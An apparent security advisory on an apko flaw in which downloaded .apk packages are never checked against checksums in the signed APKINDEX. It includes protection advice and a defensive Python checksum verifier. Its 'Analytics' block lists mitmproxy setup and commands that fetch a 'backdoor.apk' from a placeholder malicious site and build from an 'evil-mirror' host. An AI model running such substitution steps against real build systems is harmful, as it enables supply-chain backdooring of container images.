The vulnerability arises because `apko` fetches a signed `APKINDEX.tar.gz` which contains expected checksums for each package, but never actually compares those checksums against the downloaded `.apk` files. The code parses the index, retrieves the ChecksumString(), computes the control hash of the downloaded package, and then silently discards both values without any comparison inside getPackageImpl(). This allows an attacker who controls the download response (via a compromised mirror, HTTP repository, or poisoned CDN cache) to substitute any arbitrary `.apk` package, which `apko` will accept and embed into the final container image. The signature on the index is still verified, but that only ensures the index itself hasn’t been tampered with—not that the actual packages match the index. As a result, a malicious actor can inject backdoored software into images built with `apko` without triggering any error or warning.
DailyCVE Form
Platform: apko
Version: <1.2.7
Vulnerability: Checksum validation bypass
Severity: High
Date: 2026-04-23
Prediction: 2026-05-18
Analytics under What Undercode Say:
# Check if your apko version is vulnerable
apko version
# Simulate a malicious mirror that substitutes a package
sudo mitmproxy --mode transparent --set block_global=false &
# Replace the legitimate APK download with a malicious one
curl -o malicious.apk http://malicious-site/backdoor.apk
# Run apko build with HTTP repository
apko build config.yaml output.tar --repository-uri http://evil-mirror.local/alpine
# Inspect the resulting image for the tampered package
docker run --rm output.tar apk info -v
Exploit:
An attacker with Man-in-the-Middle (MITM) capabilities on the network path between `apko` and the APK repository can intercept each `.apk` download request and respond with a different package than the one requested. Because `apko` does not enforce the checksum from APKINDEX.tar.gz, the substituted package is accepted without any warning, and the final container image is built containing the attacker-controlled payload.
Protection from this CVE
- Upgrade to `apko` version 1.2.7 or later as soon as it becomes available.
- Use only HTTPS repository URLs to encrypt connections and prevent MITM attacks.
- Employ a private, trusted APK mirror with pinned TLS certificates.
- Manually verify the integrity of critical packages after each build using external tools (e.g., sha256sum).
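An added example, not apko's code: the comparison the advisory says getPackageImpl() skips, written as a stand-alone Python check that also fits the advice above to verify critical packages with external tools. It splits the .apk into its three gzip members, hashes the control member the way APKINDEX's C: field does (Q1 followed by the base64 SHA-1), parses index records, and refuses a download whose hash differs. The package bytes, index text and function names are constructed for the demo.

```python
import base64
import gzip
import hashlib
import zlib

def gzip_members(blob: bytes) -> list[bytes]:
    """Split concatenated gzip members (an .apk has three: signature, control, data) into raw bytes."""
    members = []
    while blob:
        d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # gzip framing, one member at a time
        d.decompress(blob)
        if not d.eof:
            raise ValueError("truncated gzip member")
        members.append(blob[: len(blob) - len(d.unused_data)])  # unused_data follows the trailer
        blob = d.unused_data
    return members

def control_checksum(apk: bytes) -> str:
    """The C: value APKINDEX carries for a package: 'Q1' + base64(sha1(control member))."""
    members = gzip_members(apk)
    if len(members) != 3:
        raise ValueError(f"expected 3 gzip members in .apk, found {len(members)}")
    return "Q1" + base64.b64encode(hashlib.sha1(members[1]).digest()).decode()

def parse_apkindex(text: str) -> dict[str, str]:
    """Map package name (P:) to expected checksum (C:) across APKINDEX's blank-line-separated records."""
    expected = {}
    for record in text.strip().split("\n\n"):
        fields = dict(line.split(":", 1) for line in record.splitlines() if ":" in line)
        if "P" in fields and "C" in fields:
            expected[fields["P"]] = fields["C"]
    return expected

def verify_package(name: str, apk: bytes, index: dict[str, str]) -> bool:
    """The comparison getPackageImpl() omitted: the download must reproduce the signed index's checksum."""
    return name in index and control_checksum(apk) == index[name]

def constructed_apk(pkginfo: str) -> bytes:
    """Constructed three-member .apk-shaped blob for this demo, not a real package."""
    return b"".join(gzip.compress(s.encode(), mtime=0) for s in (".SIGN.RSA.demo", pkginfo, "data"))

# Constructed sample: a genuine package, the record a signed APKINDEX would carry for it, and a
# different package served under the same name (what an untrusted mirror could return).
GENUINE = constructed_apk("pkgname = example\npkgver = 1.0-r0\n")
SUBSTITUTED = constructed_apk("pkgname = example\npkgver = 1.0-r1\n")
INDEX = parse_apkindex(f"C:{control_checksum(GENUINE)}\nP:example\nV:1.0-r0\n\nC:Q1AAAA\nP:other\n")

if __name__ == "__main__":
    print("genuine accepted:", verify_package("example", GENUINE, INDEX))  # True
    print("substituted accepted:", verify_package("example", SUBSTITUTED, INDEX))  # False
```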
Impact:
Arbitrary code execution in the resulting container image; full supply chain compromise of any image built with the vulnerable `apko` version, allowing an attacker to implant backdoors, steal credentials, or pivot to production environments.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

